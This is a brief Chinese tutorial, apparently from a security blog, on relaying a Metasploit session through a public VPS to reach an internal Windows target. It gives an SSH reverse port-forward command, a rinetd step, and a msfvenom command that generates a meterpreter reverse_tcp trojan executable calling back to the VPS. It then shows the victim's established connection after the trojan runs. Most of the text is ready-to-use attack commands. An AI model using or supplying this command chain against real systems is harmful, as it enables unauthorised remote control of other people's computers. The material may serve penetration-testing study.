配置情况
- 本地
metasploit
机器: 192.168.3.23 - 公网VPS: 181.122.37.15
- 内网靶机: 192.168.109.143
本地执行:
1 |
ssh -N -f -R 8201:192.168.3.23:8201 [email protected] |
服务器rinetd配置:
1 |
vim /etc/rinetd.conf ## 配置 |
本地执行:
1 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=181.122.37.15 lport=8022 -f exe >181.122.37.15_8022.exe |
执行木马后受害机器网络连接:
1 |
TCP 192.168.109.143:49776 181.122.37.15:8022 ESTABLISHED 3128 |
- source:wolvez.club
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论